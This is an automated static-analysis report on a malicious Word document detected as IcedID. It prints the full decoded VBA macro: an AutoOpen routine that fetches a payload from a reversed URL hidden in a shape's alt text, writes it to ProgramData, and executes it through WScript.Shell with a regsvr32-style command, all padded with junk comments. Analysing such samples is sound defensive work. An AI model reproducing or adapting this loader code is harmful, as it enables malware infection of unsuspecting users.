Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 8bd979b84ba395b8…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 97.5 KB
Created: 2020-10-13 10:42:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-10-16
MD5: 72a3d3276d9c5ebfcbc8a02a5ea73bec
SHA-1: 291575951a19b9dff64c1f9d513a1b28714e743f
SHA-256: 8bd979b84ba395b8fb05f02c4628d5f70758fd7dbe3ee8ddd9f06e7aa040b934
Risk Score: 230

Heuristics (6)

  • ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set KSCsE = CreateObject("Script" + zEcGg)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/ink — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3d — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cid — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape — In document text (OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 11743 bytes
SHA-256: 9b14d3e7a0a2cfbe7321b0e83aa0de08192e8063dc1b170cf68575fbe17b614e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "UCgPC"
Sub xWHOS(JReeH, Optional ByVal ZCbaX As String = "c:\programdata\xJGCG.txt", Optional ByVal zEcGg As String = "ing.FileSystemObject")
' Fulfilled
' Outgrowing waterfalls haste
' Delegated rubbers
' Perigee comet survive
' Syllabuses tenurial puzzles
' Passives vertebra neurologists compensator
' Suffused higgledypiggledy heckle garbs tectonically
' Emanating
' Surpass poisonings hardpressed precincts
' Marmosets inhabits
' Singly intelligently warehousing schnapps
' Cannibalised snooping denominators combated codling
' Destinies
' Meld sones servers stifling
' Soapbox priory neatening
Set KSCsE = CreateObject("Script" + zEcGg)
' Cellophane ruminate
' Except ulsters hydroelectric radiologists decidable
' Abdicates oozy extruded respired
' Hairpiece macabre pursued presupposed handful
' Fractures mamba
' Profaneness unencrypted overseen consumptive grandmas dissidents jukeboxes
Set ghtCA = KSCsE.CreateTextFile(ZCbaX)
' Phototypesetter radiograph
' Static detached sedating
' Ruder odd chuckled sickening
' Murkier underperformed variance unclenched miscounted
' Boy tantalise
ghtCA.WriteLine JReeH
' Animating instrumented perverseness soundless
' Weaning troupe indecent spearheaded
' Determinism parenthetic
' Headrest deploying covetous
' Forecasts gudgeon subtler silences
' Girded scheming herbicides
ghtCA.Close
' Interdepartmental photon gradients warmish bathhouse foxhunting
' Grittier homophobic tonsils booty conceptions reducible implying
' Shunter distaff rescinding psychedelia
' Antelope grapnel rubberstamped staid belie
' Ridiculed
' Involves deadpan draughtsman confront
' Reap lotus quintet touchingly
' Sunburns
' Gordian pleases adumbrate blemished
' Internationalised
' Toadstools curer inseparable esau tables
' Agriculturally
' Tercentenary shorter
' Bribed looney
' Confuses monophonic conservation usable
' Squeaky conferring survivable mudflats reproach financier
' Throws voteless
' Dustman adjacent australian
' Footrest
' Shellfire straits
' Starter skulked poorest
' Money modulates laid bowman seams
' Groped hissings
' Trombones pentathlete convolution minings
' Crimp programmers basted unheated disjointed
' Hers walkabouts mediation perfidiously
' Mazurka
' Ironies spindry redhanded
' Chaser bridal kindles
' Bookmaker
' Analyst connote pinching
' Credible silently hint croatia grunted selfdiscipline exceeds affect
' Meritorious hexed stir unconcern noggin
' Salivation shades
' Unwedge spruced synchronises scabbed centric encrypting
' Softspoken blight chores slumbers
' Modifies oscillations
End Sub
' Dazing fizzes carcasses euphemistically transferral
' Porcupine
' Felony hamitic
' Tendered vituperation rector boldest
' Beaver
Sub AutoOpen()
' Occident drunkenness recommissioning gerontologist
' Halftruths politest
' Poach purveyor underbody
' Nondrinkers exhorting
' Untenable twines
' Instigation
' Burgle transgression
' Railroad swat garbed publicist
' Terminator treasuries ferrying
' Thankful importunately boomerangs
' Ailerons geocentric
' Suits hayfever
' Gyrated journal organised mismatches heist biz
' Shoes marine dyspeptic porcupines
' Afield repatriated raring
' Siberia flemish
' Osteopaths palpitated aggressiveness balm crackdowns
' Topiary collaborated
' Mom degradation lisping reputation
' Tradesman custodial impression brackets
' Refund circulars deconstructive timepiece
' Entrails sicily rioters importunity recycled
' Palmed
' Lubricant bumpy hollows
' Blinds craved intoned fluidised teethes negatives sarge
' Incantatory gentility cysteine
' Nudeness footnotes systematisation
' Kept decelerated outplay spilled cheeking
' Tobago staffs groundwork guardroom scandals
Dim PqAHh As New njGZm
' Cypher constructor synchronic
' Egregious bitters fatalism festival
' Squandering wended outset
' Berated snore dictatorships
' Drills torah crisped equated
' Dishwashers lockage gluey promontories
JReeH = PqAHh.JnbRr("MSXML2.serverXMLHTTP")
' Animosities
' Archetype cursor sensible curs sightseers
' Unload busiest unwrap
' Grasp suntanned
' Quartets liberally
xWHOS ZfFJa(JReeH)
' Inhibitions skimming subjectivity vaccines
' Babbled desire
' Grannies submersible friendlier cloaked diluent
' Cramp shoddy greyed
' Tile fakery accruing henchman insinuation commotion
' Clocking reflexology
' Alleviation nationalist lightened
' Starlight supplementary
UiQiN hTTUU(0) + "vr32 c:\programdata\xJGCG.txt", "ws"
End Sub
Function vaCEk(JUqyL, LXjIC)
' Drooling accreditation
' Propaganda float burning irascibility proposer
' Aperies computing softens consultant transcendentals
' Fretsaw chacha docker albania mangler
' Irresolvable sieved blacks molecule
' Instigators parcel destroyer
' Clever misting hearties
vaCEk = Split(JUqyL, LXjIC)
End Function

Attribute VB_Name = "HYRQB"
' Northernmost chloroforming
' Crested solidifying cased transcribe misapply
' Dandy reaping straddle spittoon
' Expense lyric
' Kampala denims
' Incomprehension cataloguers inspired complexion cloying
' Mappers parametrise
Function ZfFJa(nOyVT)
' Whacked artificiality chronicling misinform
' Saxony
' Deducting crooners glossed
' Also villainous
' Patched novelle
ZfFJa = StrConv(nOyVT, vbUnicode)
' Mimosa breathes unwearied pandemics
' Acquiesced referendums lashes
' Halting permutes digestible cons nabbed
' Neatest counteroffensive wether dissent cringes
' Undemanding hobbit toehold
' Accidence subsection instabilities library
End Function
' Tomorrow clavicle joyfully
' Sententiously
' Unconsecrated dishonest
' Purdah eel
' Phrenologically scripture
Function LCOFb()
' Dogma irrelevant interdepartmental
' Becoming deluged machine baggier
' Goalscoring
' Baptism preparing
' Scrambling formality
' Resolvent airiest
' Apprehended commending
' Translational dives paralytic postilions
' Financier eloquent slimmers
' Vortex overhauled arrives
' Transit interdict continent scissor torchbearer
' Vigilantes fatted unreasonable
With ActiveDocument.shapes(1)
LCOFb = .AlternativeText
End With
End Function
' Tokenistic
' Twenties
' Stashing origami monocled wooly heeded
' Faithfully potency anthropoid
' Puffballs concatenations
' Kiosks coup winners electrode
Function hTTUU(dFaye)
' Stalemate citing untypically
' Restricting
' Annulled
' Ascendant scripts outlying glycerol
' Starship moccasins topiary
' Tractors acapulco wretches
' Varieties blesbok vigorously nineteen workman devilish destabilisation
' Disassociate heaths
' Constraint ninny propinquity
' Deface
' Seashores latencies exhibitioner ambassadorial
YuTgc = LCOFb()
pNdKN = vaCEk(YuTgc, "###")
jAIZu = pNdKN(dFaye)
hTTUU = jAIZu
End Function

Attribute VB_Name = "njGZm"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
    Dim i As Integer
    Dim StrNew As String
    Dim strOld As String
    strOld = Trim(Text)
    For i = 1 To Len(strOld)
      StrNew = Mid(strOld, i, 1) & StrNew
    Next i
    Reverse = StrNew
End Function
' Officerships whipcord interstitially
' Thirteenth suburbia joseph rebuilds
' Poetic insulates
' Discrediting lambs
Function JnbRr(zKqAj)
' Filling diehards faded salacious secreting
' Heroine streak deputes stowage
' Clockwork influences hooters
' Bureaucracy publicity architectural localisation reprovingly
' Cardboard colonialist immunologist
' Paternalistic trumpeted sweetly acclimatised
' Susceptibilities unbothered
Dim tlaFD As Object
' Bowling excels lexicography rated
' Spindry monks advance active
' Haystack who photoelectrically organelles
' Plotter nonentity communicants
' Superb blood unbending
' Shortage holocaust orthographic soared
' Surfed impacted arduous chamberlains
' Respectability bigamous flanges
' Perversion misdemeanours
Set tlaFD = CreateObject(zKqAj)
' Unadapted satirist
' Litigation jeopardised insubordinate defected regular
' Filming
' Prawns
' Niches seats troikas
' Whiled prongs approves
' Norms colluding
' Stoma faster attend equiangular
' Closeup skydive schwas grog ceaseless
' Niagara sloppily unreadable tickled nation salami
' Gerund sliced incestuous chancellorship elliptic
' Crowbars
' Unintended subtle
' Struggled laughing
' Heavies conjugating rabidly
' Dais
' Protruded frontages
' Clasped exegetical expounded hymnbook
' Snide slag unappealing skittish
' Pulsing sweden
' Hurrahs pervert weeds supplement snubs
XrIGO = hTTUU(1)
' Delible adventurous normalised
' Lustful supersonically herrings reheat maudlin
' Deacons platen crowd cramps public
' Sterilisations ingenuousness promiscuous
' Elapse
tlaFD.Open "GET", Reverse(XrIGO), False
' Deflowering plunges dollar touchandgo insidious
' Frieze legislation freshening assumption
' Bash constructors scribes numerologists
' Compulsory church snowball
tlaFD.Send
' Rearranged
' Handshake adaptor overwrote embroiling wreath
' Rafters chamberlains cairn
' Inkwells flexed methanol diagnostic
' Easterners weakness handover dreamers loamy
' Greatgranddaughter linguistics crosscheck honshu
JnbRr = tlaFD.responsebody
End Function

Attribute VB_Name = "FROCO"
Sub UiQiN(QiJYY, ACIqa)
' Truthfully sirloin rejuvenation panthers
' Receptions marathons probably inner reimbursed
' Flammability
' Soberer seeded film
' Spotting
' Bleeping tensor
Set muZEh = CreateObject(ACIqa + "cript.shell")
' Astrophysics sunless orates spawn treader stripping
' Continuing wales bawdier tarry wended clubfooted carcinogens
' Midfielders attachments
' Rationalism arrears appeases spicery uprate
' Vernal
' Atoms walkover speech humanness marcher ritualistically
' Arsonist healing guarding tunic shrews
' Pilgrimage unsuitably indulge cambodia
' Farrow ole
' Rile quayside prevails missing
' Rapids delinquency
' Musings pursuit
' Grasslands vicarages artisan variational
' Prided reel sidestep
' Cowriter
' Pyrotechnic
' Allusion quainter
' Turpentine occupier sensor balm
' Projective onesided
' Nosier flue swazi infringed
' Itinerary fuelled finding truism
' Crest retract
' Handcart jotted skilfully breeziest
' Grand samplings hadrons lifeguards undo
' Euphoniums untalented hurlyburly threatening venerates
' Placement solemn
' Achievement arraying
' Protege
' Sombre straddling scuttles
' Edibility chairmen choicest siestas diaspora subsides
' Trimmers resistively parcels bodies
' Ceaselessly syndicates levitation foragers persuading monstrously
' Phoner aswan belfries pore smokiness
' Hattricks blatantly unluckiest brainy blondes
' Stormier
' Bestseller yoke grittier
' Downing tutoring magnate
' Rubberstamped goof decays lease reshapes
' Papa clitoral wariest silliness declensions
' Rollcall resonant notepaper depressions trident
' Seminary hollies
' Aptitudes unverifiable ultrasound refurbished
' Respiration dyslexically
' Terraform seance salivas flutter
muZEh.exec QiJYY
' Reusable remission
' Oddjob exoderm counterattacked
' Mangles
' Caesar underwritten frumpy rasher
' Leaky deteriorating remarkable dissipate
' Whiter strictness sweetmeat
End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 44032 bytes
SHA-256: 21aa2815f31139c815aa6c8e60c422186554a975f61f7995fa1b2ad267e7c5b0
Detection: ClamAV: Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely